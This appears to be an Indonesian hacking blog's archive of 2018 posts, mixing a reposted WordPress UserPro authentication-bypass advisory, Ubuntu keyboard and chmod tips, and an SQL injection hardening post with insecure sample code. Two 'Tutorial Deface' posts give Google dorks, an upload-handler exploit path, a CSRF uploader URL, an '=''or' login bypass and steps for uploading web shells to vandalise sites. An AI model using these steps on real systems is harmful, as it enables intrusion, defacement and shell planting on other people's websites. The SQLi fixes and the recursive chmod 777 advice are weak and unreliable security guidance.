Aug 19, 2018

WordPress Plugin Userpro Authentication Bypass

# Exploit Title: Userpro – WordPress Plugin – Authentication Bypass
# Google Dork: inurl:/plugins/userpro
# Date: 11.04.2017
# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Version: <= 4.6.17
# Tested on: Wordpress 4.8.3
# CVE : requested, not assigned yet.

Description
================================================================================
 The userpro plugin has the ability to bypass login authentication for the user
 'admin'. If the site does not use the standard username 'admin' it is not affected.
    
PoC
================================================================================
1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target ex: http://anjing.lo/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site.
ex :
You are now logged in with full administrator access.

Jul 8, 2018

Mengatasi tombol Scroll Lock di Ubuntu tidak bekerja

Keyboard yang saya pakai mempunyai backlit (Pencahayaan) yang dapat dinyalakan dan dimatikan menggunakan tombol Scroll Lock. Ketika saya pakai di Windows, tidak ada masalah sama sekali, tapi ketika saya migrasi OS ke Ubuntu, tombol Scroll Lock tersebut tidak mau bekerja. Setelah saya membaca referensi dari Google, ternyata bukan hanya saya, sudah banyak pengguna Ubuntu yang mengalami kejadian serupa.

Dari hasil pencarian, untuk menyalakan backlit Keyboard di Ubuntu, saya memberi perintah berikut di terminal :
xset led named "Scroll Lock"
Sebagai kebalikannya, untuk mematikan backlit pada Keyboard, saya menggunakan perintah berikut :
xset -led named "Scroll Lock"
 Kedua perintah diatas dapat menyalakan atau mematikan lampu Keyboard terlepas dari tombol Scroll Lock ditekan atau tidak.

Jelas sangat merepotkan jika harus membuka terminal terlebih dahulu jika ingin menyalakan lampu di Keyboard.

Perintah lain yang saya coba untuk menyalakan dan mematikan lampu di keyboard adalah dengan perintah berikut :
xmodmap -e 'add mod3 = Scroll_Lock'
Sekarang saya bisa menyalakan ataupun mematikan lampu pada Keyboard menggunakan tombol fisik Scroll Lock.

Tapi, Solusi ini hanya berlaku sementara sampai komputer di matikan. Ketika memulai ulang Ubuntu, tombol Scroll Lock kembali tidak merespon. Saya harus memberi perintah xmodmap lagi agar tombol Scroll Lock bisa mengatur backlit.

Solusi lain yang terbilang lebih permanen adalah dengan mengedit pemetaan symbols milik xkb di directory /usr/share/X11/xkb/symbols. Direktori ini berisi file konfigurasi pemetaan symbols yang dikelompokkan dalam kode negara. Untuk melihat kode negara yang aktif (yang saya pakai) di Keyboard saat ini, Saya menggunakan perintah berikut :
setxkbmap -query
Pada Keyboard saya, nilai layout adalah us. Oleh sebab itu saya akan mengubah file /usr/share/X11/xkb/symbols/us dengan menambahkan baris berikut pada file tersebut :
...
xkb_symbols "basic" {

  name[Group1]= "English (US)"; 
  ...
  modifier_map Mod3 { Scroll_Lock };

};
...
Tips: Jangan sampai salah mengubah file ini, karena bisa menyebabkan OS tidak mau menerima masukan dari Keyboard lagi.

Sekarang, setelah memulai ulang Ubuntu, tombol Scroll Lock dapat dipakai untuk menyalakan dan mematikan lampu pada Keyboard seperti seharusnya.
Akan tetapi, Solusi ini tetap tidak sempurna. Saat melakukan upgrade Ubuntu, saya seringkali menjumpai perubahan yang saya lakukan pada file us sudah hilang, yang membuat saya harus kembali melakukan langkah seperti di artikel ini.

Sekian tips kali ini, semoga bermanfaat.

Jul 4, 2018

Cara Menutup Bug SQL Injection.


Cara Menutup Bug SQL Injection. SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa pemrograman lain.

Ada beberapa tools yang bisa kita gunakan untuk melakukan SQL Injection, misalnya :

1. SQL Map

SQL Map adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

2. Havij

Havij adalah alat untuk melakukan SQL Injection yang menguji penetrasi untuk menemukan dan mengeksploitasi kerentanan SQL Injection pada suatu halaman web.

Karena tutorial melakukan SQL Injection udah banyak berkeliaran di google, kali ini saya mau membahas tentang bagaimana cara menutup bug yang sangat rawan ini.

Contoh script yang vuln terhadap SQLi:

<?php
include "admin/config.php";
$id_anu = $_GET['id_anu'];
$result = mysql_query("SELECT * FROM anu where id_anu ='$id_anu' ");
while($row = mysql_fetch_array($result)){
?>


Di source code diatas terlihat tidak adanya filter untuk karakter seperti ('), (-), (--) sehingga bisa disisipi dengan perintah SQLi. Lalu, bagaimana cara menutup bug tersebut? Kali ini saya akan menggunakan easy method untuk menutup bug tersebut.

1. Memberi filter pada karakter yang akan dimasukkan ke dalam query. Kita halau karakter seperti (-) terlebih dahulu.
if($id_anu < 0) {
echo "Patched.";
exit;
}
//Definisi logika: Jika nilai $id kurang dari 0, maka akan tampil "Patched."   |   Mencegah karakter (-).
2. Memberi perintah is_numeric
if(!is_numeric($id_anu)) {
echo "Patched.";
exit;
}
//Definisi logika: Jika nilai $id bukan golongan darin numeric atau angka, maka akan tampil "Patched."
3. Memberi fungsi mysql_real_escape_string.
mysql_real_escape_string adalah fungsi PHP yang digunakan untuk memberi backslash di beberapa kode untuk ditampilkan pada halaman, namun saat menyimpan menuju sql, kode akan tetap normal tanpa ada backslash.
$id_anu = mysql_real_escape_string($_GET['$id_anu']);

Special Thanks for,
Berandal

Mar 30, 2018

Tutorial Deface WP Orange Themes

Hello guys, kambek egen wit mi in hir.
Setelah sebelumnya gua ngepost Tutorial Deface dengan metode Bypass Admin, sekarang gua mau share Tutorial Deface WP Orange Themes, Maybe ini exploit lama, tapi gpp la asal dapet yang perawan + bening. Lanjut bahan & langkah2 ea coek.

Dork : inurl:/wp-content/themes/kernel-theme/
           inurl:/wp-content/themes/bordeaux-theme/
           inurl:/wp-content/themes/bulteno-theme/
           inurl:/wp-content/themes/rayoflight-theme/

Exploit : /wp-content/themes/nama-temanya/functions/upload-handler.php
CSRF : http://kedareddy.com/b.php

Piye om carane?

Pertama dan yang paling utama, dorking dulu la

Pilih gambar terus klik kanan, lalu klik "Open Image in New Tab" , terus tambahin exploitnya
Ex : site.co.li/wp-content/themes/rayoflight-theme/functions/upload-handler.php
Vuln ? muncul tulisan "error"
kek gini yg vuln
Disini lo buka CSRF Onlen, terus masukkin Target, Postfile isi  dengan "orange_themes" (tanpa tanda kutip)

Terus klik "Jepit" , disitu bakal muncul form uploader, pilih file yang mau lo upload, lalu klik "Cr00t!", Kalo success upload file, nanti muncul nama filemu.
(Kalo pas upload muncul tulisan "No Php" coba buat upload file extensi .html.)

Shell Akses ? site.co.li/wp-content/uploads/(tahun)/(bulan)/file.php
Ex : site.co.li/wp-content/uploads/2018/03/a.php

Oke mungkin segini aja gua ngeshare tutorial pepes. Happy Deface & See you !.

Thx For : Berandal - OWL Squad

Tutorial Deface dengan Metode Bypass Admin

Hello fans, hello haters, Adm0n wuz here ;) . Kali ini gua bakal share Tutorial Deface dengan Metode Bypass Admin. Oke otw bahan & tutor cok.


Bahan :
1. Dork
2. Shell
3. Koneksi
4. Cakep (Karena Face ngaruh disini)
5. Udud
6. Udud
7. Kesabaran (Ini yang paling penting)

Dork :
inurl:/admin.php intext:login intext:adminsitrator
    inurl:/admin/index.php intext:username
    inurl :/admin/Admin.php intext:login
    inurl:/administrator/login.php intext:username site:.co.li
    inurl:/login.php intext:administrator intext:login

Lets do a fuckin act bitch,

1. Dorking ke google.
2. Cari target lo
3. Isi username & password dengan '=''or'
4. Kalo vuln, biasanya masuk dashboard admin
5. Nah kalo dah masuk, serah lo mau diapain, mau di acak2 kek, mau upshell kek , ato apa serah lo gua ga ngurus (form buat upshell biasanya ada di Banner atau di Add News, kalo gaada silahkan putar otakmu itu buat mikir.)

Mungkin segitu aja Tutorial Deface dengan Metode Bypass Admin. Dikarenakan gua lagi males ngetik tapi pengen ngepost, jadinya gini.

Yaudah si, semoga berfaedah.


Mar 28, 2018

Pengertian CHMOD dan Contoh Penggunaannya


Pernah mendengar kata CHMOD? Bila anda seorang Web Developer atau Pengguna Sistem Operasi UNIX, pasti udah ga asing lagi deh sama yang namanya CHMOD. Ya, CHMOD adalah kepanjangan dari Change Mode, sebuah perintah untuk memberi hak akses/permissions kepada pemilik, user biasa, dan non user. CHMOD inilah yang menjaga keamanan dari suatu data, jika ada user nakal yang berusaha untuk mengakses, mengubah, bahkan membaca data yang bukan haknya.

Nah, sekarang gua mau berbagi dikit tentang CHMOD dan cara penggunaannya. Hak akses suatu data, disimbolkan dengan angka.

0 = Tidak ada hak akses
1 = Hak akses untuk masuk dan mengeksekusi suatu data atau folder (direktori)
2 = Hak akses untuk menulis/mengubah suatu data atau folder (direktori)
4 = Hak akses untuk membaca suatu data atau folder (direktori)

Jadi jika semuanya dijumlahkan menjadi 7, yang berarti suatu user mempunyai hak penuh akan akses data atau folder (direktori) tersebut. Suatu data dapat diakses oleh 3 user, yaitu root (pemilik data), user group, dan user non-group.
Berikut contohnya :

Contoh Chmod

Chmod 753, berarti :
7 = 4+2+1 : root (pemilik file) mempunyai hak untuk mengeksekusi (1), menulis (2), dan membaca (4) suatu data atau direktori.
5 = 4+1 : user group mempunyai hak untuk membaca (4) dan mengeksekusi (1) suatu data atau direktori.

3 = 2+1 : user non group mempunyai hak untuk menulis (2) dan mengeksekusi suatu data atau direktori.

Contoh Penggunaan Chmod

Jika anda ingin mengubah hak akses dari suatu data atau direkori, dari hak akses 644 menjadi 755 (agar dapat dibaca) berikut caranya :

chmod 755 [nama file]

Contoh :
chmod 755 asu.php (untuk file)
chmod 755 /files/images(untuk direktori/folder)

Jika ingin mengubah hak akses suatu folder yang di dalamnya ada banyak folder dan file, bisa menggunakan perintah berikut :

find [direktori] -type f -exec chmod 777 {} \;     (untuk file)
find [direktori] -type d -exec chmod 777 {} \;    (untuk folder/direktori)

Contoh :
find /home/garox/htdocs-linux -type f -exec chmod 777 {} \;     (untuk file)
find /home/garox/htdocs-linux -type d -exec chmod 777 {} \;    (untuk folder/direktori)

Dan jika ingin menyembunyikan suatu data atau direktori dapat menggunakan perintah berikut :

chmod 700 [nama file atau folder]

Contoh :
chmod 700 index.php (untuk file)
chmod 700 /files/image/ (untuk folder/direktori)

Tapi jika anda pusing untuk menentukan suatu hak akses/permissions sebuah file/dir, anda bisa menggunakan tools dari website Chmod Calculator.

Ok mungkin segini aja yang bisa gua bagiin tentang CHMOD, Semoga berfaedah.